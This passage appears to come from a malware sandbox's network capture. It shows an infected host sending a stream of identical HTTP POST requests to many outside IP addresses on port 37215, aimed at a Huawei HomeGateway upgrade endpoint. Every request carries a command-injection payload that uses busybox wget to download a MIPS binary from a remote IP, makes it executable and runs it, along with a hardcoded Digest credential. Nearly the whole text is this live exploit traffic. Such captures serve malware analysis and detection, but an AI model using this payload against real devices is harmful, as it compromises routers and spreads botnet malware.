                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            933192.168.2.1353314197.122.60.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.339504957 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            934192.168.2.1341730156.25.228.8837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.340485096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            935192.168.2.1340136156.14.120.1237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.341706038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            936192.168.2.1338744197.11.229.11137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.342705011 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            937192.168.2.135790041.238.228.15037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.343950033 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            938192.168.2.135569841.202.25.5537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.345057011 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            939192.168.2.1348376197.68.156.21137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.346134901 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            940192.168.2.135623841.121.99.4637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.347131014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            941192.168.2.1351598156.2.114.4537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.348284960 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            942192.168.2.133883841.78.83.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.349379063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
